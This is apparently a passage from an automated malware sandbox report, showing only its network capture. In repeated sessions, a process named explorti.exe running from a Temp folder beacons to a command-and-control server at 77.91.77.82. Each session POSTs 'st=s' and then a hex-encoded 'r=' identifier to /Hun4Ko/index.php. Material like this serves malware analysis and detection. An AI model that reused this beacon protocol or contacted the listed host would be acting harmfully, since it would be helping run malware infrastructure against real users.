                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.46390577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:57.287997007 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:57.990040064 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:57.990873098 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:58.209270954 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.46390677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:58.319219112 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:26:59.019534111 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:26:59.020570993 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:26:59.242985964 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.46390777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:26:59.354149103 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:00.057714939 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:26:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:00.058614969 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:00.278817892 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.46390877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:00.400249958 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:01.116863966 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:01.117686987 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:01.344875097 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.46390977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:01.478835106 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:02.163516998 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:02.168847084 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:02.384871006 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.46391077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:02.506833076 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:03.200985909 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:03.201634884 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:03.422889948 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.46391177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:03.539798021 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:04.249039888 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:04.250235081 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:04.474925041 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.46391277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:04.585591078 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:05.279551983 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:05.280596972 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:05.494954109 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.46391377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:05.618160963 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:06.326930046 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:06.327687025 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:06.548983097 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.46391477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:06.662681103 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:07.349061966 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:07.349777937 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:07.564707041 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.46391577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:07.679048061 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:08.387412071 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:08.388183117 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:08.612716913 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.46391677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:08.727130890 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:09.450851917 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:09.451632023 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
